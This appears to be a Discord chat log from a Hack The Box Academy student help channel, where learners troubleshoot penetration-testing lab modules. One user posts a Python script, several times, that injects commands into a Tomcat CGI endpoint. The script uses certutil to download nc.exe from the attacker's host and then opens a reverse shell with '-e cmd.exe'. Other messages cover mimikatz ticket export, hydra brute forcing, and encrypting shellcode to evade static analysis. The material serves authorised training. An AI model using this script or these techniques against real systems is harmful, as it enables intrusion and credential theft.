#modules

the commands im running on the kali machine are sed -i 's/\s\s\+/\n/g' cert.pem followed by openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Hey guys I was reading through the Networking module of HTB had some confusion. It's explain how traceroute works:

The process repeats until the TCP SYN packet reaches the destination host and receives a TCP SYN/ACK or a TCP RST response from the target
However what would happen, if the destination simply drops the packet and doesn't respond would the process keep on going? Or how will the process stop?

It has a timeout and max retry

Oh alright that makes sense. Ty for the help

hello guys, my modüle password attack pass the ticket from linux
why im not connect the david

i want to connect david ssh 172.16.1.15

Attacking Email Services
What is the available username for the domain inlanefreight.htb in the SMTP server?
I am stuck in this module. i have tried
smtp-user-enum -M RCPT -U users.txt -D inlanefreight.htb -t 10.129.69.89
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... users.txt
Target count ............. 1
Username count ........... 79
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ inlanefreight.htb

######## Scan started at Tue Apr 2 15:41:01 2024 #########
######## Scan completed at Tue Apr 2 15:42:20 2024 #########
0 results.

79 queries in 79 seconds (1.0 queries / sec)
I have also tried the remaining modes in smtp-user-enum (VRFY,EXPN,RCPT)
i am using the usernames list which is provided in the resources. i don't know what is the mistake here.
any help?

you are to connect from the linux host.

im try

but not working

this module connect linux from windows

@soft cedar

I dont use this version of smtp-user-enum
because it is funky for me..

I used the pip version :
https://github.com/cytopia/smtp-user-enum

Thankyou i'll give it a try.

yes but it has been port forwarded to you on port 2222.

im try 22 and 2222

can you share the output of the command you used in the pwnbox?

oky

yes, you can just install with pip3 smtp-user-enum.
the syntax is a bit different tho when using it.

It worked!. LOL i don't know that there exist these many tools with the same name and purpose

but you are already david?

yes but this macinhe 1.5

we need to go 1.15

https://academy.hackthebox.com/module/147/section/1657

connect it from your linux terminal.

I tried to connect but it wouldn't connect, so I don't exactly know how to do that since I haven't moved to that module yet.

hm

my terminal just waiting

maybe restart your VM / target.

oky

Hi guys for Advanced XSS and CSRF Exploitation - CORS Misconfiguration section. Can I get some nudge? I developed the exploit. But the withCredentials property in xhr object just doesn't seem to work. It keeps exfiltrate the unlogged in page even though I've already logged in as htb-stdnt in my browser.

same problem on the chapter pass the ticket from windows i have creds

how to report a problem

Then you should contact support.

I think the green HTB logo on the bottom right.

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

yes it s that i will know fore next ty

I used my own kali for connection - it works until I try to connect to ssh. (It works fine in parrot os)

2024-04-02 07:31:02 read UDPv4 [ENETUNREACH]: Network is unreachable (fd=3,code=101)
2024-04-02 07:31:03 read UDPv4 [ENETUNREACH]: Network is unreachable (fd=3,code=101)
2024-04-02 07:31:10 read UDPv4 [ENETUNREACH]: Network is unreachable (fd=3,code=101)

Can anyone help me please? I am trying to prepare my parrot OS vm ready for the exam.. I cannot install mysql and crackmapexec to work on it. I created another kali machine and they work on it, but it has problem connecting to ssh for some weird reason

I'm looking at malware for red-teaming ethical purposes, and I'm looking at the Static-Analysis section of this course and it's talking about encrypting shellcode to evade static analysis, I'm assuming this "shell-code" is just the hex code of this program? No tutorial teaches you how to get this shell-code do you just open a hex editor and get it via that or am I getting confused on what shell code actually is?

hei

Hi am new here
Can any one teach me how to hack as a beginner

shellcode is just a small piece of code that can be used as a payload and executed, for example, to get a reverse shell. tools like msfvenom can generate it

Password attacks lab medium. Did enum and found three users. Can I get a hint. How long more or less did you wait for mutated pw to run through these three. I just want to make sure I’m not wasting time

anybody having problems on this challenge in CDSA? inetsim appears to be working fine on VM however the patched shell isnt working

The mutated list from the module should work. But depends obviously what you're using it for.

Ok cool. It’s just slow and I hate wasting time, thanks. Hint for all those alwyays enum and use what you have user wise

Anon logins are always juicy

Yeah me too - but as a rule of thumb: If it's not working after more than 10 mins, you're probably doing something wrong.

Anyone?

I don’t want generated shellcode, the point is I have code in a file that is detected by default I want to encrypt that and decrypt it at runtime to bypass static analysis

So do I get this “shellcode” or whatever it is via a hex editor? I don’t understand at all

This docx is a pain I encrypted the encrypted and now I can’t open it with anything viable

you can transfer it to a windows vm /box and view it there.

Ugh

or install libreoffice on linux.

Yeah I’m doing libre now

well, I find that convenient, since I could just drag & drop

shellcode is literally just binary data which can be loaded to do something, you can't just turn a program into shellcode, if you want to write them, it's usually writtern in assembly or from minimal C. if you already have a program that does something, then you can't just run it as shellcode, you'll need to find other ways. there's many resources on this, why don't you use google?
https://www.ired.team/offensive-security/code-injection-process-injection/writing-and-compiling-shellcode-in-c

also this is off topic for this channel

Very late reply but in the dump file what specifically are you searching for in order to get to that block of code? I do see the disable defender. ps1 in the dmp however but no other ps1s

always read the whole text I've been trying to complete a module for about 30 minutes now

I wasn't reading the entire terminal output from the command and obtaining it several times without noticing

big giga brain

well I already knew the answer so I was searching for that lol you could try and search for various tool names or just "power" I guess. But again, if you aren't familiar with the tool name I'm not sure if you'd recognize it

Hi, I have a question. On Silver annual subscription it says I'd have access to
"- Direct access to all modules up to (including) Tier II",
but on monthly Silver it doesn't show it. Is this a perk only for the people who subscribe for a year?

ye

student plan gives you access to tier 2 modules too

if you can get academic email...

Yeah, I'm 4th year student and have academic e-mail, I'm not sure if it works with my uni (it's in Bulgaria, Eastern Europe)

im also from Bulgaria, mon works....

the problem is that you might lose ur account when the email expires

Thanks, I'm gonna think about it. It expires in a few months so I'd lose all my progress

if your academic email doesn't work, you can reach out to htb and have them confirm your email

I registered with my other e-mail (student email) and it allows me to subscribe for their student plan now.

I'm gonna sub with it for now, not sure when it expires but it's not for at least 3-4 more months. I'll swap later if they delete it.

Thank you very much

for the windows event logs finding evil module can i get help the 1st question didn't provide the right id or time for the answer and now im completely lost for the 2nd one if anyone can give me insight or hints to complete it id be grateful

nvm i got it

Did you ever figure this out? I have the shell but I cannot find anything either

Yes. The monthly and annual plans are different

I'm having a troubling time with DNS and host file for this exercise 💀
I've done the echo 'ip address url' >> /etc/hosts which should fix the missing page or so I think
but I can't seem to get it to work as I intend

These things can be so finnickity sometimes

Because you need sudo to write to /etc/hosts

Yeah I'm using sudo to write to /etc/hosts I'm aware of that much

Which is why most people will either sudo [text editor] /etc/hosts

Or echo ip domain | sudo tee -a /etc/hosts

Your command shown isn't using sudo

Are you saying you switched to root?

In which case, that's also just bad practice and habits

After you ran your command, did you try reading the /etc/hosts file to see if it even added it?

Yes, I confirmed that it was included within the /etc/hosts file

What does your hosts file look like then

Funnily enough, using nano instead of adding it to the file instead of just the terminal resolved it appropriately

¯_(ツ)_/¯

Thanks for the suggestion, I haven't had that issue arise before

hi guys i'm fresh new

i really appreciate every help thank you ❤️

im in linux PE module, i tried the exact same steps shown in the section Miscellaneous Techniques

but when i try to execute the shell i get this error

the host you compiled the binary in has a newer glibc than the target, either compile in an older version (probably pwnbox) or statically link it

how can i link it

since i may run into this in an exam where pwnbox wouldn't be beneficial to switch to or so

https://gcc.gnu.org/onlinedocs/gcc/Link-Options.html

I just have a couple of older ubuntu vms for stuff like this

when is the secure coding certificate

i see they're making a secure coding path

thanks ! i hope i at least don't run into problems like this in exam lol

same problem in pwnbox :/

run ldd --version , the compiling host's version needs to be lower or equal than the target's

i will do it later i turned off my pc, thank you

hello guys. I have stuck on ZAP. I can't set the scope to the site that I want to target

does anyone know how to do it?

you just right click on it and pick add to context

Hii guys, I've been going through the IDS/IPS evasion section of the nmap module, and am having difficulty understanding the concepts.

Can someone please tell me in this "Scan by using different Source IP" example, the - S <ip> is our VM's ip that we are scanning the target with or is it some other ip?

I did it but its still out of scope

It's a simple action, just right cilck on the site and choose add to new context. https://www.zaproxy.org/docs/desktop/start/features/scope/

is it bc I use pwnbox?

i doubt it

I cant send image here

can I send you a dm?

make sure you're right clicking in the sites or history tab

just use the help page it can explain it better than me, i can't troubleshoot it for you

https://www.zaproxy.org/docs/desktop/start/features/contexts/

for some reason I can use the spider mode but not in UI

hi all i'm stuck on file upload attacks module in blacklisted filters whenever i upload a .php file with a test message i send the request to the intruder and do what the module says and start the attack to get non blacklisted extensions however it gives me that every file the i upload regardless of its extensions is allowed (file successfully uploaded) and when i try to reach for that payload i get 404 not found any nugget here ?

DM me

If you're using HUD, make sure you've added the website in the right context, when i use the HUD i have default context and HUD context

Guys, is the windows priv esc skill assessment 1 VM broken? ||Yesterday after trying like 15 different CLSID I managed to get SYSTEM user. Now today the CLSID that worked no longer does and so far I've tried again a lot to no avail.||

ohh okayy I will search for it now

Anyone know what's going on here?

you need to put the folder name in " " if there is a space in it

it thinks you are trying to call "GhostPack" with the argument "Compiled"

Ty. I did not know that

For the NTLM Cross-protocol Relay Attacks, question : Use impacket's SOCKS server to hold NPORT's relayed connections and abuse them to access the MSSQL service at 172.16.117.60; query the 'flag' table within the 'development01' database and submit the flag. I'm getting this error : [-] Connection against target mssql://172.16.117.60 FAILED: [('SSL routines', '', 'no protocols available')]

I'd appreciate some help please.

Is it broken or did someone actually do it ?

Why won’t it let me upload a picture?

https://discord.com/channels/473760315293696010/477042232109826048

ez way is start typing the folder name and hit tab

These new gpt jailbreaks are so scary

Hey guys! New guy here. Do you guys know if it is allowed to do modules with a vm or another computer instead of using the pwnbox? Because I honestly find it easier to do with a vm but it just hit me that i dont even know if thats legal lol. Thanks in advance ❤️

yes thats the prefered way. they offer the VPN aswell since you cant access machines without it

Awesome! Thanks alot 🙂

under each module that has questions there is a vpn. you only need to download it once

then you just sudo openvpn nameofthefile.ovpn

I had no trouble connecting so far nor have I seen those yet (the VPNs). But I assume they will come when I get further into the modules

are you doing the cpts path?

Nah im doing Cracking into Hack the Box

not all sections have questions at the end, not sure about the specific module that you are doing but in cpts path you have these cube marks where it means there are questions you need to complete.

maybe you just reading the introduction section thats why you havent see em?

I'm over with the introduction, but lets be honest it is a noob friendly module. I'm sure they will show up as I progress. So thanks for the headsup

i believe cracking into hack the box has the Web Requests, JavaScript Deobfuscation, and Getting Started modules

I don’t think it worked…

Im doing web reuqests right now

Can I get some help with cors misconfiguration?

https://tenor.com/view/n3gat1ve-simon-gif-22685414

Nah all the modules easy never got stuck ever

guys i'm stuck on Introduction to Academy

Hahaha. Well when I say noob friendly I mean I can actually get through. Trust me i spend alot of time on some of them (all of them)

Hello man can you help me please 2 mins ? I have a problem with my paylaod ... #!/usr/bin/env python3 import time import requests host='10.129.201.89'#add host to connect port='8080'#add port of host {default:8080} server_ip='10.129.201.89'#server that has nc.exe file to get reverse shell server_port='80' nc_ip='10.10.15.78' nc_port='1234' url1 = host + ":" + str(port) + "/cgi/cmd.bat?" + "&&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3A%2F%2F" + server_ip + ":" + server_port + "%2Fnc%2Eexe+nc.exe" url2 = host + ":" + str(port) + "/cgi/cmd.bat?nc.exe+" + server_ip + "+" + nc_port + "+-e+cmd.exe" try: requests.get("http://" + url1) time.sleep(2) requests.get("http://" + url2) print(url2) except: print("Some error occured in the script")

Section : https://academy.hackthebox.com/module/113/section/1097 Last Question

server it is ip target ?

nc_ip it is my machine and host it is ip target server

You should wrap your code in triple backticks

And you need to tell the module, section and question

It is ok ?

No

import time
import requests
host='10.129.201.89'#add host to connect
port='8080'#add port of host {default:8080}
server_ip='10.129.201.89'#server that has nc.exe file to get reverse shell
server_port='80'
nc_ip='10.10.15.78'
nc_port='1234'
url1 = host + ":" + str(port) + "/cgi/cmd.bat?" + "&&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3A%2F%2F" + server_ip + ":" + server_port + "%2Fnc%2Eexe+nc.exe"
url2 = host + ":" + str(port) + "/cgi/cmd.bat?nc.exe+" + server_ip + "+" + nc_port + "+-e+cmd.exe"
try:
    requests.get("http://" + url1)
    time.sleep(2)
    requests.get("http://" + url2)
    print(url2)
except:
    print("Some error occured in the script")```

Triple backticks

Not single

alt + print screen to screencap current window, win + shift + s to use snipping tool

That’s better

ah okay thanks

sorry

What module is this?

this

And section

Type it out, I’m on mobile. Not logged in to academy

ATTACKING COMMON APPLICATIONS
Attacking Common Applications - Skills Assessment I

okay no problem

Ok, what’s the issue?

when I run my paylaod it doesn't work I followed the different docs that I saw but I don't understand where my error is

What does it show when you run it

How can host and server ip be the same?

yes bad copy now : I have :

import time
import requests
host='10.129.201.89'#add host to connect
port='8080'#add port of host {default:8080}
server_ip='10.10.15.78'#server that has nc.exe file to get reverse shell
server_port='80'
nc_ip='10.10.15.78'
nc_port='1234'
url1 = host + ":" + str(port) + "/cgi/cmd.bat?" + "&&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3A%2F%2F" + server_ip + ":" + server_port + "%2Fnc%2Eexe+nc.exe"
url2 = host + ":" + str(port) + "/cgi/cmd.bat?nc.exe+" + server_ip + "+" + nc_port + "+-e+cmd.exe"
try:
    requests.get("http://" + url1)
    time.sleep(2)
    requests.get("http://" + url2)
    print(url2)
except:
    print("Some error occured in the script")```

My http.server :

[sudo] Mot de passe de indra : 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.201.89 - - [02/Apr/2024 22:16:11] "GET /nc.exe HTTP/1.1" 200 -
10.129.201.89 - - [02/Apr/2024 22:16:11] "GET /nc.exe HTTP/1.1" 200 -```

but my shell...

Ok it does get the nc.exe

You have your listener set up?

Stuck how? What part.

yes ``` Directory of C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi

04/02/2024 12:56 PM <DIR> .
04/02/2024 12:56 PM <DIR> ..
09/01/2021 07:58 AM <DIR> %SystemDrive%
09/29/2021 09:26 AM 73,802 bHPVV.exe
08/31/2021 01:55 PM 48 cmd.bat
04/02/2024 01:16 PM 30 nc.exe
3 File(s) 73,880 bytes
3 Dir(s) 28,375,203,840 bytes free```

And in my nc.exe I have :

nc.exe 10.10.15.78 1234 -e sh

That’s wrong

You set up a listener on your kali with nc -lvnp 1234

The script executes nc <ip> <port> -e cmd.exe, as it’s windows

You only have to set up a listener

What listener I must to use ?

I gave you the command

.

So set up http server where you have the nc.exe binary, nc -lvnp 1234 in another window and then run the python script

This is exactly what I did

anybody know how to get an SSH password for login to port 22?

tried Hydra but nothing :/

You said this

That’s not it

what are you trying to do, log into a box you spawned? don't brute force ssh

yeah did an nmap and found port 22 open

On what?

now just trying to do ssh @10.10.11.253

perfection box

perfection

unless the module is very specific about attacking ssh, don't attack ssh

Like this?

Ah #boxes is the place to ask, read and follow #welcome to access it

I don't care

That looks good, strange how it doesn’t get hit

Then you won't get answers here

How did you see the nc.exe on the target machine?

I'm telling you the appropriate place to ask for assistance with a box

Yes I'm a little lost to tell the truth, I've started it twice now and it doesn't work. 🥲

its on the SSH port

asks for a password to login to it

He's doing the perfection box, not an academy module

Yeah I saw

Yes, I've done it twice now and I find myself stuck here again. Could you help me?

?

I haven't done that module

import time
import requests
host='10.129.201.89'#add host to connect
port='8080'#add port of host {default:8080}
server_ip='10.10.15.78'#server that has nc.exe file to get reverse shell
server_port='80'
nc_ip='10.10.15.78'
nc_port='4444'
url1 = host + ":" + str(port) + "/cgi/cmd.bat?" + "&&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3A%2F%2F" + server_ip + ":" + server_port + "%2Fnc%2Eexe+nc.exe"
url2 = host + ":" + str(port) + "/cgi/cmd.bat?&ncat.exe+" + server_ip + "+" + nc_port + "+-e+cmd.exe"
try:
    requests.get("http://" + url1)
    time.sleep(2)
    requests.get("http://" + url2)
    print(url2)
except:
    print("Some error occured in the script")```

which module is that?

https://academy.hackthebox.com/module/113/section/1097 this plz

for the Attacking Common Applications - Skills Assessment I - We don't understand why it doesn't work 🥲

simple commands do work for you?

like trying to run dir

yes

it works

Your command shows ncat.exe, yet what's uploaded is nc.exe

Yes I use nc before

and here I test ncat it isn't okay too

Yes it should be the problem

Ncat.exe doesn't exist on the system

look at your exploit code, url1 uploads the nc executable as nc.exe to the remote machine, and then you're trying to use a ncat.exe executable which doesn't exist on the system, because it was uploaded under a different name

btw Marcie do you remember me? you've helped me a lot back then lol

Ok thanks so I go to use nc like on the picture

look py captur please because I had changed to do tests

If I remember you, it's usually a bad sign

yeah I see, just to verify, is port 4444 open in your firewall?

Because it generally means I remember you being an idiot

💀

yes ^^"

It works on my machine @dreamy solar

Did you change your code to reflect 4444?

😭

Did you allow for spaces in your command?

python3 -m http.server 80 in dir where i have nc.exe

nc -lvnp 1234 in other window

#!/usr/bin/env python3
import time
import requests
host='10.129.124.251' #add host to connect
port='8080' #add port of host {default:8080}
server_ip='10.10.15.2' #server that has nc.exe file to get reverse shell
server_port='80'
nc_ip='10.10.15.2'
nc_port='1234'
url1 = host + ":" + str(port) + "/cgi/cmd.bat?" + "&&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3A%2F%2F" + server_ip + ":" + >
url2 = host + ":" + str(port) + "/cgi/cmd.bat?&nc.exe+" + server_ip + "+" + nc_port + "+-e+cmd.exe"
try:
    requests.get("http://" + url1)
    time.sleep(2)
    requests.get("http://" + url2)
    print(url2)
except:
    print("Some error occured in the script")

then run script

make sure you change my tun0 ip to yours

import time
import requests
host='10.129.201.89' #add host to connect
port='8080' #add port of host {default:8080}
server_ip='10.10.15.78' #server that has nc.exe file to get reverse shell
server_port='80'
nc_ip='10.10.15.78'
nc_port='1234'
url1 = host + ":" + str(port) + "/cgi/cmd.bat?" + "&&C%3a%5cWindows%5cSystem32%5ccertutil+-urlcache+-split+-f+http%3A%2F%2F" + server_ip + ":" + server_port + "%2Fnc%2Eexe+nc.exe"
url2 = host + ":" + str(port) + "/cgi/cmd.bat?&nc.exe+" + server_ip + "+" + nc_port + "+-e+cmd.exe"
try:
    requests.get("http://" + url1)
    time.sleep(2)
    requests.get("http://" + url2)
    print(url2)
except:
    print("Some error occured in the script")

don't you have command execution on the victim?

i may have missed some context but you posted a pic of you being able to execute 'dir' on a remote system through a webpage, is that the computer you're trying to get a shell on?

it doesn't work it's really weird did you make another modification???

yes

can you show me the directory where you run your python http server?

If you have command execution, why are you trying to get a shell

And you have a nc listener on 1234?

To make it easier to find the flag
and because it is the exercise in the end

Is this your host?

You really should just get a kali vm

check the desktop

all this time with that shell you could have found it by now, easier to just curl

yes it is my host limit I go to do exercice on th e machine Parot VM

are you on the vpn?

yes

Btw, you can use metasploit to achieve this.

Try it from parrot

if you know the cve.

nothing

Ohhh I see where you’re wrong

The nc.exe needs to be the actual nc.exe binary. Not some self made file

hello guys, i have question i use the carlos keytab file and acces'De carlos directory but cant read file or download how to read carlos.txt or download

Remove the -c ls

Or change it to -c cat carlos.txt

If you chose the former you can get Carlos.txt after connecting to it

smbclient //dc01/carlos/carlos.txt -k -c cat

Remove -c cat

And remove /Carlos.txt

But I just do a Chmod +x ?

No

You need to download the nc.exe binary from GitHub

ohhh

Or just get a kali vm like I said

okkk

Because they have windows binaries installed

yes im connect but i can not reading file im try get, cat, more

wow Okayy thanks !!

If you’re connected, do get carlos.txt

smbclient //dc01/carlos -k

get carlos.txt

hah oky

You're getting a bad network name because smbclient only connects to directories, you need to get rid of the "Carlos.txt" then try reading it again, as it shows here its trying to access //dc01/carlos/carlos.txt/ as a directory

You'd need to first connect to the share then get the file

This might be a stupid question - and if it is so I apologize from the get go - but I remember silver monthly subscription was providing access to all modules up to Tier 2. Did this change or my account is having a hiccup?

With -c get filename

At the end, since it was the cat command, I tried adding it like that, but it actually works as you said, I solved it, thank you.

Silver annual does, not monthly

Yes it's also because cat doesn't know how to read a blank input

Ah thank you for the clarification.

Hi, quick question about the Attacking Enterprise Networks module. I've found the initial access, but my revershell crashes (I'm using nc as a listener). I've also stabilised it. I'm asking this to find out if it's a network problem or if I need a special conf for the reverse shell.

Maybe connection problems

That explains why my pwncat doesn't work either x)

I've also noticed that when I run my burp command from the repeater, the request is on standby, and as soon as my shell crashes, I get the response

https://academy.hackthebox.com/module/143/section/1423

need some help with this. After using mimikatz ||kerberos::list /export|| command, it should dump the kirbi files to folder I'm currently in however nothing is generated.. there's no errors when I run the command either.

try this

i get this error: ERROR kuhl_m_sekurlsa_acquireLSA ; Key import

do you use privilege::debug ?

I have a question for a machine, I can´t make a "nmap -sCV [IP]" and it didn´t happened in the video of the resolution

I did

It´s blocking the ping probes

hi guys anybody having the same issue as I am here?

I have a question. I took the kt file of the svc workstations user and connected with smbclient, but I don't know how to go further.

i have aes256 hash for svc user

module - Pass the Ticket (PtT) from Linux

whats module can share screenshot

Crack the ntlm hash

hash aes256

Which keytab did you extract?

kt

Use the all.kt

python3 /opt/keytabextract.py /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt

i use this file

Wrong one, look at the above message.

-_-

i dont understand

Check the .scripts directory.

There should be more than one keytab there..

he

okey

i found out why it wasnt writing a file, was running "base64 /out:true" which looks to me as it just cats out the hash instead of writing it to a file

been on this one for 2 days now. im just lost. i used all the tools in the lesson but i dont have access to sudo. do i need to escalate privledges? i want to run lazagne but cant as a normal user. this is Credential Hunting in Linux in Password Attacks

No need for privesc, there is the firefox tool though

ah okay ill keep looking. ill come back in an hour if i have no progress xd

got it! thank u

on the ssh host 2.27

in my linux vm 2.37

so i found the two shadow files i need to unshadow. tried wget on my machine (tried running nc on the targets machine) and scp. neither were able to get this file downloaded. can someone point me in the right direction?

lmao i just compiled it in the ssh host, and then transfered it to my machine as root so it changed the owner to root, deleted the first compiled shell in the ssh and trasnfered it from my linux vm

so i can have now a complied shell with root owner and compiled in the wanted library

has anyone figured out the logrotate task in linux privesc module? i found the writable file and logrotten executes the payload but no shell

It looks like you don't have permission to write to /home/

You need to trigger logrotate to do its job

you need to trigger the rotation , force it

thank you both @buoyant void and @crystal steeple ! i was able to get in and grab the flag before it closed rn!

Good job! I know that took me a little bit to figure out as well

There's three (if I recall correctly) parts that need to be patched out. Seems like you might have missed one.

i patched all 3 but couldnt get pass it..however I did not patched the 2nd one and Im able to bypass it.. I guess the section needs an updating

Im able to finish the challenge now

If it's a tier 0 module the cubes come from completing the module

Also delete the image as its a spoiler you goon

yes boss

and one more thing. i know /var/mail/htb-student was one of the answers, but it didnt exist in the htb-student system. wont this be confusing for new comers?

It's in the env

Specifically the MAIL environment variable

correct me if im wrong but the module "Linux Fundamentals" didnt brush up on the $MAIL variables beforehand.

It does talk about the env command, which lists environment variables

i see

Not important, it was definitely in poor taste. This also isn't the relevant channel to discuss random things

when running hashcat against this list, can i go ahead and remove all hashes for all the other users? i only need to find root. its taking a long time running it against rockyou.txt

My pfp has nothing to do with it

Yeah you can just copy the root line into its own file

got it thank you!

It's a turn of phrase ya goon

i want to make sure im reading this correctly, this example is showing how to do it on your attack machine right? it would make no sense (to me) to use my /passwd and /shadow to get the flag. its referring to using the .bak's i got from the target?

Yes

Your unshadowed file looks correct

Excuse me, I got a notification saying "these people are talking about sexual harrasment". How can I stop it?

cool, its just taking awhile to crack i guess ;/

Don't have skill issue

But its a thing you have to go into server settings for

Okay.

i think my computer is going to explode if he has to do another 1mil

how are you only getting 2kH/s?

don't run hashcat in a vm, do it in your host

Sounds like their cpu is mid

yeah

plus the progress is in ~ 32%
are you doing the right thing?

Granted I'm surprised my Frankenstein system works... I'm fairly certain at this point my laptop is possessed

you're running it on bare metal? vm adds a ton of overhead

im not supposed to run this on virtualbox? ^ this is what im working with

hashcat is vms is very slow, do it in your host

use the mutated wordlist

@autumn pilot which mutated? mutated with the Loveyou1 password? or just use the password list they had in the resources

or custom.rule + password.list

Which path to do after "InfoSec Foundations"?

this ^

thank you ill give it a shot in the morning

Information Security Foundations is the prerequisite for the Penetration Tester job path

do you need to know reverse engineering + advanced programming to find 0 days?

if you're interested in web, go for Bug Bounty Hunter instead

or if you feel like blue teaming, check out the extra modules from the SOC Analyst Prerequisites skill path (there's quite an overlap)

does hackthebox teach u the process behind finding zero days in pen test path?

@soft cedar

No

you can just ask your question here bro.

see

you've got the entire database at your disposal

check the tables.

double clicked on it

it just opens prompts with some attributes

can I see?

and then you might want to delete them after, since they contain spoilers.

Tables folders opens nothing

when clicked

In an SQL database you can run SQL queries

take advantage of that

see

.

hey guys a quick help if you know. I am on Kerberoasting from windows and follow the example with mimikatz. The commands I used are base64 /out:true and kerberos::list /export
all work good but I dont see any files saved.. Do you know why?

nothings there

Just telling me to see it is not going to make me see it as to me it sounds like you want to be handheld at every step and showing that you are uncertain what you want to do

Instead of pasting screenshots from the exercises, try to craft some short explanation of what you have been trying to do

And don't forget all fo the exercises be it in sections or skills assessments are based on the knowledge you gain through the sections

there was no training for MSSQL

If you skipped the base64 output, it will be written to the disk.

there is literally a section called MSSQL in the footprinting module

Thanks

Hello ! I have a question regarding the Windows AD Enumeration module.

I wanted to know if it's normal to not have the MDNS protocol's entries via wireshark and via tcpdump.

I don't why, but for example tcpdump does'nt work very well, a huge part of the packets is dropped by the kernel.

Responder works well.

I'm connected via ssh to the parrot vm (for tcpdump).

You can connect via RDP to the target VM and use wireshark

I did this too, I did not mentionned it, sry. wireshark or tcpdump do not work to capture MDNS packets. That is not a real problem, but I wanted to know if it is related to the vm or a configuration and wanted to capture the packets by myself instead of just looking at the pictures.

I've just tried with wireshark and was able to see the MDNS requests, make sure you to start wireshark using sudo -E wireshark

Yeah ok, I'll do this again. That's the command I used. Maybe the vm was unstable.

Ok, I suppose that I am doing something wrong, but no mdns packets. Only NBNS, ARP and tcp packets.

can someone help me with Advanced SQL Injection Skills Assessment. i am able to extract column_names but the columname for the passwords have some weird behavior. i think the password should begin with a known character because of the hashtype, anyone have time to check some things with me.

Is anyone able to give some pointers on 'AD Enumeration & Attacks - Skills Assessment Part II' Q8, I've been stuck here for a while, running out of ideas

Hi, you can dm if you are still blocked 😉

dump things and check what you can access with the things you found

Hi Folks, in the Linux Privilege Escalation module, in the restricted shell escape module, I managed to break out of the shell from outside, but wanted to check if someone found an alternative method from within the shell ?.

there is but I can't remember what they are

I know there are 2 methods tho

hehe ok, well if your memory comes back feel free to ping 😄

I've gotten myself a meterpreter reverse shell on SQL01, and I manage to dump the hashes and gotten the administrator NTLM hash, couldn't crack it with rockyou.txt so tried to pass the hash with it to access MS01, but all the method i've tried to pass the hash didn't work

there are other things you can dump than just the system hive

you've gotten the local admin's hash, which is not a domain account, so it wouldn't work on other hosts

you can also use ||echo||

try this
https://stackoverflow.com/questions/22377792/how-to-use-echo-command-to-print-out-content-of-a-text-file

Thanks, I triied a few things in || echo|| but not all of them. I mannaged to do it with || no profile trick ||as well

yeah, just ||echo *|| to list the files in the dir first. then you can read the flag.

Dumped the logonpasswords, found clear text pw for ms******, bloodhound says that it has local admin rights on MS01

yep

anybody have any insight on this? been at it for 2 days now 😅

did the module ask you to run the sed command? the openssl command is just
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Clear text password didn't work, but managed to pass the hash and got access. Thanks for the tip!!!

@next bronze ive tried both with and without sed. is cert.pem supposed to contain both private key and certificate?

yep

the mut password list really really does not work

retried like 6 times over the past 5 hours to no avail

Is there other ports open?

ftp smb etc

all tried but all failed

What module and section are you doing

Overall I wouldn’t recommend bruteforcing ssh with a big list, as it’s much slower

academy password attacks > mutations part

I have been staring at my terminal for the past 6 hours for this shit

You made the mutation list with the password list from the resources, and the custom rule you created in the section?

yep

even tried everything such as removing anything with less than 10 char

and only taking top 20k or top 5k as some of the prev convos here suggested

Try bruteforcing ftp, with a bit less threads

already did it with 64t

Try 48

The attack does still take some time though, but should work

nope the thing nuked itself

ugh I need something to do while mist went bust

Connection error

Please reset your target

for the 6th time today alright

If I remember correctly the password stared with a B

So you could filter for that

regex timez I guess

Should speed it up a bit

Read #welcome and #rules . This question has nothing to do with this server

sorry sir

capital B or every single b

If I remember correctly it was a capital B

You can remove everything before that in the list

If you then use hydra with 48 threads on ftp, it should work

@earnest mulch got it?

Would I be equipped with the necessary toolset for hacking boxes after completing penetration tester path?

anyone know if we can get the htb academy badges to show our real name instead of username?

Where am I making a mistake here?

im connect the julio smb share and im use julio ccache file

pass the ticket from linux

julio 2 file expire

there's 2 of those, did you try both?

also you don't have to use a command with smbclient, you can just connect to it

yup

im try 2 file

krb5cc_647401106_HRJDux
krb5cc_647401106_dfFgjE

klist says expire

I'm having trouble with the module "AD Enumeration & Attacks - Skills Assessment Part I". One of the domain hosts in the attack path doesn't seem to be up? Does anyone know how to find a box ops person?

you sure you've tried both? do it again

oky

in INTRODUCTION TO MALWARE ANALYSIS - Skills Assessment , Examine the communication patterns of the malware and provide the domain it interacts with as your answer. Answer format: .._ . I've used 64dpg on apple.exe I've tried to find the domain in Symbols tab and reference tab but I couldn't, can someone help me ?

you can reset the lab

I've reset it a couple times already. So I'm guessing there's a higher probability that something is wrong with the environment.

its work -_-

most probably not, what host is down

Perhaps any of you who have been working on this module lately? I'm starting to wonder if it's just me?

if you've reset the lab and it's still the same, it's likely you're doing something wrong

u see i can't lookup SQL01

I can't get to it even if I get an SPN account.🥲

ms01 is ok .That's why I suspect there's something wrong with the environment. Or what am I doing wrong?

you don't have to reach the host to kerberoast, the spn is assoiated with an account, not a host

I've finished kerberoasting(the SPN MSSQLSvc/SQL01.inlanefreight.local:1433). So I need to get to that host(SQL01), don't I?

but you can't find that host, correct? so move to somewhere else

hey guys i've been struggling on this question. So far I have found the service on the port and scanned some other ports but I am having trouble finding exploits for the services

Maybe something here? https://wpscan.com/wordpress/561/

I've had a look but idk exactly what i'm looking for in terms of something that will help me get to the flag 😭

did you look at the webpage in your browser?

I have tried but it ends up saying that it is unable to connect idk if im doing something wrong

reset then

okay thanks i'll try again from scratch

i dont understand this question

Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).

